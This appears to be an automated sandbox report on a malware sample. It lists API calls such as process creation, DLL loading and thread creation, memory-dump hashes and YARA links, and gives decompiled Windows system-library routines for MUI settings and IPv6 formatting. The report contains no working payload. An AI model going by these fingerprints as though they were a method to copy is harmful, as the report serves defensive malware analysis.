                                                  Function 00098922, Relevance: 1.6, APIs: 1, Instructions: 57processCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 000989B4
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.666207492.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateInternalProcess
                                                  • String ID:
                                                  • API String ID: 2186235152-0
                                                  • Opcode ID: 094e51e23af4bb7b1d548c9768e865ef781313d38fbc9217cb17b27efd105611
                                                  • Instruction ID: cee52c63d112b59fb22dbe13a72d54745bd67b806e090cc58a19047dc2885926
                                                  • Opcode Fuzzy Hash: 094e51e23af4bb7b1d548c9768e865ef781313d38fbc9217cb17b27efd105611
                                                  • Instruction Fuzzy Hash: B01170B1208148AFCB10DFACDC80DE77BA8AF8D314B14864DF95DD7252C630E911CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00089B40, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00089BB2
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.666207492.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Load
                                                  • String ID:
                                                  • API String ID: 2234796835-0
                                                  • Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                                  • Instruction ID: e86aff2a251993461c8f19ce8f59d5b2e716b6b85be94ab1a68e25288db0fcf2
                                                  • Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                                  • Instruction Fuzzy Hash: FB0100B5D0010DBBDF10EAE4ED42FDDB3B8AB54714F0441A5A90897245F671EB149791
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0009895D, Relevance: 1.5, APIs: 1, Instructions: 44processCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 000989B4
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.666207492.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateInternalProcess
                                                  • String ID:
                                                  • API String ID: 2186235152-0
                                                  • Opcode ID: 6d0b06c699708e53ff8f0bb3957af3d6ccfcc01f6d9a6745d33784ec34099d02
                                                  • Instruction ID: 15842cc3c347e3609124eba4ff534ae4e45dc8882cf7f39270a7e025cd3b3928
                                                  • Opcode Fuzzy Hash: 6d0b06c699708e53ff8f0bb3957af3d6ccfcc01f6d9a6745d33784ec34099d02
                                                  • Instruction Fuzzy Hash: F601AFB2214108BFCB54CF99DC85EEB77A9AF8C394F158258FA4DE7251C630E851CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00098960, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 000989B4
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.666207492.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateInternalProcess
                                                  • String ID:
                                                  • API String ID: 2186235152-0
                                                  • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                  • Instruction ID: 5d9bfaf3f39d49bf681189af4845158e9ac26461c1eeca07089ad4d6307b009b
                                                  • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                  • Instruction Fuzzy Hash: 8101AFB2214108ABCB54DF89DC80EEB77ADAF8C754F158258FA0D97251C630E851CBA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00097430, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0008CCF0,?,?), ref: 0009746C
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.666207492.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateThread
                                                  • String ID:
                                                  • API String ID: 2422867632-0
                                                  • Opcode ID: 9105e1c37fac6013095626d5dca2d108c43f6eb99556836844f3cecf00598bb3
                                                  • Instruction ID: 3f2c91ec48de79bbf87023d97282ebb3f17c085ff0fc3f582d2f96abef18ec24
                                                  • Opcode Fuzzy Hash: 9105e1c37fac6013095626d5dca2d108c43f6eb99556836844f3cecf00598bb3
                                                  • Instruction Fuzzy Hash: D9E092333903043AEB3065A99C03FE7B39CCB81B24F550026FA4DEB2C2D595F80142A4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00097423, Relevance: 1.5, APIs: 1, Instructions: 33threadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0008CCF0,?,?), ref: 0009746C
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.666207492.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateThread
                                                  • String ID:
                                                  • API String ID: 2422867632-0
                                                  • Opcode ID: 28d70c5c30ab8e909a7d2ac7a87e3de5c96f99c30beacfeaf07ec269229bf7d0
                                                  • Instruction ID: 0eb562cc7cf096cfea8100e602a93ae0c86233e7582c375caa3a71aab732e909
                                                  • Opcode Fuzzy Hash: 28d70c5c30ab8e909a7d2ac7a87e3de5c96f99c30beacfeaf07ec269229bf7d0
                                                  • Instruction Fuzzy Hash: EBF02B333903003AE630556C8C02FEB77989FD1B24F590119F68DBB2C2C691B80182A8
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00098A85, Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,?,0008CFC2,0008CFC2,?,00000000,?,?), ref: 00098A80
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.666207492.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                  Yara matches
                                                  Similarity
                                                  • API ID: LookupPrivilegeValue
                                                  • String ID:
                                                  • API String ID: 3899507212-0
                                                  • Opcode ID: 37087e82f7051e5ac04932086f1789566a94f37bda58a1aca5d3ce74193ea33f
                                                  • Instruction ID: 1734fa8f686a6d071d7624dcb0b30544838341c572a58eb2a91464e08865e713
                                                  • Opcode Fuzzy Hash: 37087e82f7051e5ac04932086f1789566a94f37bda58a1aca5d3ce74193ea33f
                                                  • Instruction Fuzzy Hash: 23E0D8781442819BDF14EF68E8C09EB77A4EFC5324324C64AE85C97702C735D42ADBA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00098A50, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,?,0008CFC2,0008CFC2,?,00000000,?,?), ref: 00098A80
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.666207492.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                  Yara matches
                                                  Similarity
                                                  • API ID: LookupPrivilegeValue
                                                  • String ID:
                                                  • API String ID: 3899507212-0
                                                  • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                  • Instruction ID: 754199b42c501ae7296ba584b5924547fcc67e3e9be56436f73295e8645572b0
                                                  • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                  • Instruction Fuzzy Hash: A6E01AB12002086BDB10DF89CC85EE737ADAF88650F018154FE0857242C930E910CBF5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0008D430, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetErrorMode.KERNELBASE(00008003,?,?,00087C83,?), ref: 0008D45B
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.666207492.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorMode
                                                  • String ID:
                                                  • API String ID: 2340568224-0
                                                  • Opcode ID: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
                                                  • Instruction ID: 8045f5a81e9c2629aa03cdbc33acc79fd66f29b2be47c5d44376951cb22c637a
                                                  • Opcode Fuzzy Hash: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
                                                  • Instruction Fuzzy Hash: 65D0A7717503043BEB10FAA49C03F6633CC6B45B44F494064FA48D73C3D960F9008561
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0008D461, Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetErrorMode.KERNELBASE(00008003,?,?,00087C83,?), ref: 0008D45B
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.666207492.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorMode
                                                  • String ID:
                                                  • API String ID: 2340568224-0
                                                  • Opcode ID: 84f890dc3b900513e6fe0799518dc24c2b79df9bbb1d5419475dbbc69e3c0fe6
                                                  • Instruction ID: 3aeb5c9ed446f1a7a2a3e5f31b22f45f7bf5c6a491c76d4125b4e71c27dd9ebd
                                                  • Opcode Fuzzy Hash: 84f890dc3b900513e6fe0799518dc24c2b79df9bbb1d5419475dbbc69e3c0fe6
                                                  • Instruction Fuzzy Hash: E9D012616C01151BAE02B5F13C4255A2359DB61655B5A4496AD48CB1C3FA21CE5542A2
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Non-executed Functions

                                                  Function 02318788, Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 94%
                                                  			E02318788(signed int __ecx, void* __edx, signed int _a4) {
				signed int _v8;
				short* _v12;
				void* _v16;
				signed int _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				void* _t216;
				intOrPtr _t231;
				short* _t235;
				intOrPtr _t257;
				short* _t261;
				intOrPtr _t284;
				intOrPtr _t288;
				void* _t314;
				signed int _t318;
				short* _t319;
				intOrPtr _t321;
				void* _t328;
				void* _t329;
				char* _t332;
				signed int _t333;
				signed int* _t334;
				void* _t335;
				void* _t338;
				void* _t339;

				_t328 = __edx;
				_t322 = __ecx;
				_t318 = 0;
				_t334 = _a4;
				_v8 = 0;
				_v28 = 0;
				_v48 = 0;
				_v20 = 0;
				_v40 = 0;
				_v32 = 0;
				_v52 = 0;
				if(_t334 == 0) {
					_t329 = 0xc000000d;
					L49:
					_t334[0x11] = _v56;
					 *_t334 =  *_t334 | 0x00000800;
					_t334[0x12] = _v60;
					_t334[0x13] = _v28;
					_t334[0x17] = _v20;
					_t334[0x16] = _v48;
					_t334[0x18] = _v40;
					_t334[0x14] = _v32;
					_t334[0x15] = _v52;
					return _t329;
				}
				_v56 = 0;
				if(E02318460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						_t207 = E022FE025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
					}
					_push(1);
					_v8 = _t318;
					E0231718A(_t207);
					_t335 = _t335 + 4;
				}
				_v60 = _v60 | 0xffffffff;
				if(E02318460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
					_t333 =  *_v8;
					_v60 = _t333;
					_t314 = E022FE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					_push(_t333);
					_v8 = _t318;
					E0231718A(_t314);
					_t335 = _t335 + 4;
				}
				_t216 = E02318460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
				_t332 = ";";
				if(_t216 < 0) {
					L17:
					if(E02318460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
						L30:
						if(E02318460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
							L46:
							_t329 = 0;
							L47:
							if(_v8 != _t318) {
								E022FE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
							}
							if(_v28 != _t318) {
								if(_v20 != _t318) {
									E022FE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
									_v20 = _t318;
									_v40 = _t318;
								}
							}
							goto L49;
						}
						_t231 = _v24;
						_t322 = _t231 + 4;
						_push(_t231);
						_v52 = _t322;
						E0231718A(_t231);
						if(_t322 == _t318) {
							_v32 = _t318;
						} else {
							_v32 = E022FE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
						}
						if(_v32 == _t318) {
							_v52 = _t318;
							L58:
							_t329 = 0xc0000017;
							goto L47;
						} else {
							E022F2340(_v32, _v8, _v24);
							_v16 = _v32;
							_a4 = _t318;
							_t235 = E0230E679(_v32, _t332);
							while(1) {
								_t319 = _t235;
								if(_t319 == 0) {
									break;
								}
								 *_t319 = 0;
								_t321 = _t319 + 2;
								E022FE2A8(_t322,  &_v68, _v16);
								if(E02315553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
								_v16 = _t321;
								_t235 = E0230E679(_t321, _t332);
								_pop(_t322);
							}
							_t236 = _v16;
							if( *_v16 != _t319) {
								E022FE2A8(_t322,  &_v68, _t236);
								if(E02315553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
							}
							if(_a4 == 0) {
								E022FE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
								_v52 = _v52 & 0x00000000;
								_v32 = _v32 & 0x00000000;
							}
							if(_v8 != 0) {
								E022FE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
							}
							_v8 = _v8 & 0x00000000;
							_t318 = 0;
							goto L46;
						}
					}
					_t257 = _v24;
					_t322 = _t257 + 4;
					_push(_t257);
					_v40 = _t322;
					E0231718A(_t257);
					_t338 = _t335 + 4;
					if(_t322 == _t318) {
						_v20 = _t318;
					} else {
						_v20 = E022FE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
					}
					if(_v20 == _t318) {
						_v40 = _t318;
						goto L58;
					} else {
						E022F2340(_v20, _v8, _v24);
						_v16 = _v20;
						_a4 = _t318;
						_t261 = E0230E679(_v20, _t332);
						_t335 = _t338 + 0x14;
						while(1) {
							_v12 = _t261;
							if(_t261 == _t318) {
								break;
							}
							_v12 = _v12 + 2;
							 *_v12 = 0;
							E022FE2A8(_v12,  &_v68, _v16);
							if(E02315553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
							_v16 = _v12;
							_t261 = E0230E679(_v12, _t332);
							_pop(_t322);
						}
						_t269 = _v16;
						if( *_v16 != _t318) {
							E022FE2A8(_t322,  &_v68, _t269);
							if(E02315553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
						}
						if(_a4 == _t318) {
							E022FE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
							_v40 = _t318;
							_v20 = _t318;
						}
						if(_v8 != _t318) {
							E022FE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
						}
						_v8 = _t318;
						goto L30;
					}
				}
				_t284 = _v24;
				_t322 = _t284 + 4;
				_push(_t284);
				_v48 = _t322;
				E0231718A(_t284);
				_t339 = _t335 + 4;
				if(_t322 == _t318) {
					_v28 = _t318;
				} else {
					_v28 = E022FE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
				}
				if(_v28 == _t318) {
					_v48 = _t318;
					goto L58;
				} else {
					E022F2340(_v28, _v8, _v24);
					_v16 = _v28;
					_a4 = _t318;
					_t288 = E0230E679(_v28, _t332);
					_t335 = _t339 + 0x14;
					while(1) {
						_v12 = _t288;
						if(_t288 == _t318) {
							break;
						}
						_v12 = _v12 + 2;
						 *_v12 = 0;
						E022FE2A8(_v12,  &_v68, _v16);
						if(E02315553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
						_v16 = _v12;
						_t288 = E0230E679(_v12, _t332);
						_pop(_t322);
					}
					_t296 = _v16;
					if( *_v16 != _t318) {
						E022FE2A8(_t322,  &_v68, _t296);
						if(E02315553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
					}
					if(_a4 == _t318) {
						E022FE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
						_v48 = _t318;
						_v28 = _t318;
					}
					if(_v8 != _t318) {
						E022FE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					}
					_v8 = _t318;
					goto L17;
				}
			}





































                                                  0x02318788
                                                  0x02318788
                                                  0x02318791
                                                  0x02318794
                                                  0x02318798
                                                  0x0231879b
                                                  0x0231879e
                                                  0x023187a1
                                                  0x023187a4
                                                  0x023187a7
                                                  0x023187aa
                                                  0x023187af
                                                  0x02361ad3
                                                  0x02318b0a
                                                  0x02318b0d
                                                  0x02318b13
                                                  0x02318b19
                                                  0x02318b1f
                                                  0x02318b25
                                                  0x02318b2b
                                                  0x02318b31
                                                  0x02318b37
                                                  0x02318b3d
                                                  0x02318b46
                                                  0x02318b46
                                                  0x023187c6
                                                  0x023187d0
                                                  0x02361ae0
                                                  0x02361ae6
                                                  0x02361af8
                                                  0x02361af8
                                                  0x02361afd
                                                  0x02361afe
                                                  0x02361b01
                                                  0x02361b06
                                                  0x02361b06
                                                  0x023187d6
                                                  0x023187f2
                                                  0x023187f7
                                                  0x02318807
                                                  0x0231880a
                                                  0x0231880f
                                                  0x02318810
                                                  0x02318813
                                                  0x02318818
                                                  0x02318818
                                                  0x0231882c
                                                  0x02318831
                                                  0x02318838
                                                  0x02318908
                                                  0x02318920
                                                  0x023189f0
                                                  0x02318a08
                                                  0x02318af6
                                                  0x02318af6
                                                  0x02318af8
                                                  0x02318afb
                                                  0x02361beb
                                                  0x02361beb
                                                  0x02318b04
                                                  0x02361bf8
                                                  0x02361c0e
                                                  0x02361c13
                                                  0x02361c16
                                                  0x02361c16
                                                  0x02361bf8
                                                  0x00000000
                                                  0x02318b04
                                                  0x02318a0e
                                                  0x02318a11
                                                  0x02318a14
                                                  0x02318a15
                                                  0x02318a18
                                                  0x02318a22
                                                  0x02318b59
                                                  0x02318a28
                                                  0x02318a3c
                                                  0x02318a3c
                                                  0x02318a42
                                                  0x02361bb0
                                                  0x02361b11
                                                  0x02361b11
                                                  0x00000000
                                                  0x02318a48
                                                  0x02318a51
                                                  0x02318a5b
                                                  0x02318a5e
                                                  0x02318a61
                                                  0x02318a69
                                                  0x02318a69
                                                  0x02318a6d
                                                  0x00000000
                                                  0x00000000
                                                  0x02318a74
                                                  0x02318a7c
                                                  0x02318a7d
                                                  0x02318a91
                                                  0x02318a93
                                                  0x02318a93
                                                  0x02318a98
                                                  0x02318a9b
                                                  0x02318aa1
                                                  0x02318aa1
                                                  0x02318aa4
                                                  0x02318aaa
                                                  0x02318ab1
                                                  0x02318ac5
                                                  0x02318ac7
                                                  0x02318ac7
                                                  0x02318ac5
                                                  0x02318ace
                                                  0x02361bc9
                                                  0x02361bce
                                                  0x02361bd2
                                                  0x02361bd2
                                                  0x02318ad8
                                                  0x02318aeb
                                                  0x02318aeb
                                                  0x02318af0
                                                  0x02318af4
                                                  0x00000000
                                                  0x02318af4
                                                  0x02318a42
                                                  0x02318926
                                                  0x02318929
                                                  0x0231892c
                                                  0x0231892d
                                                  0x02318930
                                                  0x02318935
                                                  0x0231893a
                                                  0x02318b51
                                                  0x02318940
                                                  0x02318954
                                                  0x02318954
                                                  0x0231895a
                                                  0x02361b63
                                                  0x00000000
                                                  0x02318960
                                                  0x02318969
                                                  0x02318973
                                                  0x02318976
                                                  0x02318979
                                                  0x0231897e
                                                  0x02318981
                                                  0x02318981
                                                  0x02318986
                                                  0x00000000
                                                  0x00000000
                                                  0x02361b6e
                                                  0x02361b74
                                                  0x02361b7b
                                                  0x02361b8f
                                                  0x02361b91
                                                  0x02361b91
                                                  0x02361b99
                                                  0x02361b9c
                                                  0x02361ba2
                                                  0x02361ba2
                                                  0x0231898c
                                                  0x02318992
                                                  0x02318999
                                                  0x023189ad
                                                  0x02361ba8
                                                  0x02361ba8
                                                  0x023189ad
                                                  0x023189b6
                                                  0x023189c8
                                                  0x023189cd
                                                  0x023189d0
                                                  0x023189d0
                                                  0x023189d6
                                                  0x023189e8
                                                  0x023189e8
                                                  0x023189ed
                                                  0x00000000
                                                  0x023189ed
                                                  0x0231895a
                                                  0x0231883e
                                                  0x02318841
                                                  0x02318844
                                                  0x02318845
                                                  0x02318848
                                                  0x0231884d
                                                  0x02318852
                                                  0x02318b49
                                                  0x02318858
                                                  0x0231886c
                                                  0x0231886c
                                                  0x02318872
                                                  0x02361b0e
                                                  0x00000000
                                                  0x02318878
                                                  0x02318881
                                                  0x0231888b
                                                  0x0231888e
                                                  0x02318891
                                                  0x02318896
                                                  0x02318899
                                                  0x02318899
                                                  0x0231889e
                                                  0x00000000
                                                  0x00000000
                                                  0x02361b21
                                                  0x02361b27
                                                  0x02361b2e
                                                  0x02361b42
                                                  0x02361b44
                                                  0x02361b44
                                                  0x02361b4c
                                                  0x02361b4f
                                                  0x02361b55
                                                  0x02361b55
                                                  0x023188a4
                                                  0x023188aa
                                                  0x023188b1
                                                  0x023188c5
                                                  0x02361b5b
                                                  0x02361b5b
                                                  0x023188c5
                                                  0x023188ce
                                                  0x023188e0
                                                  0x023188e5
                                                  0x023188e8
                                                  0x023188e8
                                                  0x023188ee
                                                  0x02318900
                                                  0x02318900
                                                  0x02318905
                                                  0x00000000
                                                  0x02318905

                                                  APIs
                                                  Strings
                                                  • Kernel-MUI-Language-SKU, xrefs: 023189FC
                                                  • Kernel-MUI-Language-Disallowed, xrefs: 02318914
                                                  • Kernel-MUI-Language-Allowed, xrefs: 02318827
                                                  • Kernel-MUI-Number-Allowed, xrefs: 023187E6
                                                  • WindowsExcludedProcs, xrefs: 023187C1
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.666622449.00000000022E0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: true
                                                  • Associated: 00000007.00000002.666615943.00000000022D0000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000007.00000002.666691395.00000000023C0000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000007.00000002.666697417.00000000023D0000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000007.00000002.666703330.00000000023D4000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000007.00000002.666708873.00000000023D7000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000007.00000002.666713954.00000000023E0000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000007.00000002.666740002.0000000002440000.00000040.00000001.sdmp Download File
                                                  Similarity
                                                  • API ID: _wcspbrk
                                                  • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                  • API String ID: 402402107-258546922
                                                  • Opcode ID: e32b4ebd5f8c2e92e157748568088497affeec3ce5a6988382607b668dc954a7
                                                  • Instruction ID: ac15fd17c4bb23f4e8f228e09d7387f26328fa602937863a76f77bd8a2194ac8
                                                  • Opcode Fuzzy Hash: e32b4ebd5f8c2e92e157748568088497affeec3ce5a6988382607b668dc954a7
                                                  • Instruction Fuzzy Hash: 6DF113B2D00209EFDB55DFD8C9849EEBBB9BF08304F14846AE605A7621E7349A45DF60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 023313CB, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 38%
                                                  			E023313CB(intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _t71;
				signed int _t78;
				signed int _t86;
				char _t90;
				signed int _t91;
				signed int _t96;
				intOrPtr _t108;
				signed int _t114;
				void* _t115;
				intOrPtr _t128;
				intOrPtr* _t129;
				void* _t130;

				_t129 = _a4;
				_t128 = _a8;
				_t116 = 0;
				_t71 = _t128 + 0x5c;
				_v8 = 8;
				_v20 = _t71;
				if( *_t129 == 0) {
					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
						goto L5;
					} else {
						_t96 =  *(_t129 + 8) & 0x0000ffff;
						if(_t96 != 0) {
							L38:
							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
								goto L5;
							} else {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t86 = E02327707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
								L36:
								return _t128 + _t86 * 2;
							}
						}
						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
						if(_t114 == 0) {
							L33:
							_t115 = 0x22f2926;
							L35:
							_push( *(_t129 + 0xf) & 0x000000ff);
							_push( *(_t129 + 0xe) & 0x000000ff);
							_push( *(_t129 + 0xd) & 0x000000ff);
							_push( *(_t129 + 0xc) & 0x000000ff);
							_t86 = E02327707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
							goto L36;
						}
						if(_t114 != 0xffff) {
							_t116 = 0;
							goto L38;
						}
						if(_t114 != 0) {
							_t115 = 0x22f9cac;
							goto L35;
						}
						goto L33;
					}
				} else {
					L5:
					_a8 = _t116;
					_a4 = _t116;
					_v12 = _t116;
					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
						if( *(_t129 + 0xa) == 0xfe5e) {
							_v8 = 6;
						}
					}
					_t90 = _v8;
					if(_t90 <= _t116) {
						L11:
						if(_a8 - _a4 <= 1) {
							_a8 = _t116;
							_a4 = _t116;
						}
						_t91 = 0;
						if(_v8 <= _t116) {
							L22:
							if(_v8 < 8) {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t128 = _t128 + E02327707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
							}
							return _t128;
						} else {
							L14:
							L14:
							if(_a4 > _t91 || _t91 >= _a8) {
								if(_t91 != _t116 && _t91 != _a8) {
									_push(":");
									_push(_t71 - _t128 >> 1);
									_push(_t128);
									_t128 = _t128 + E02327707() * 2;
									_t71 = _v20;
									_t130 = _t130 + 0xc;
								}
								_t78 = E02327707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
								_t130 = _t130 + 0x10;
							} else {
								_push(L"::");
								_push(_t71 - _t128 >> 1);
								_push(_t128);
								_t78 = E02327707();
								_t130 = _t130 + 0xc;
								_t91 = _a8 - 1;
							}
							_t91 = _t91 + 1;
							_t128 = _t128 + _t78 * 2;
							_t71 = _v20;
							if(_t91 >= _v8) {
								goto L22;
							}
							_t116 = 0;
							goto L14;
						}
					} else {
						_t108 = 1;
						_v16 = _t129;
						_v24 = _t90;
						do {
							if( *_v16 == _t116) {
								if(_t108 - _v12 > _a8 - _a4) {
									_a4 = _v12;
									_a8 = _t108;
								}
								_t116 = 0;
							} else {
								_v12 = _t108;
							}
							_v16 = _v16 + 2;
							_t108 = _t108 + 1;
							_t26 =  &_v24;
							 *_t26 = _v24 - 1;
						} while ( *_t26 != 0);
						goto L11;
					}
				}
			}




















                                                  0x023313d5
                                                  0x023313d9
                                                  0x023313dc
                                                  0x023313de
                                                  0x023313e1
                                                  0x023313e8
                                                  0x023313ee
                                                  0x0235e8fd
                                                  0x00000000
                                                  0x0235e921
                                                  0x0235e921
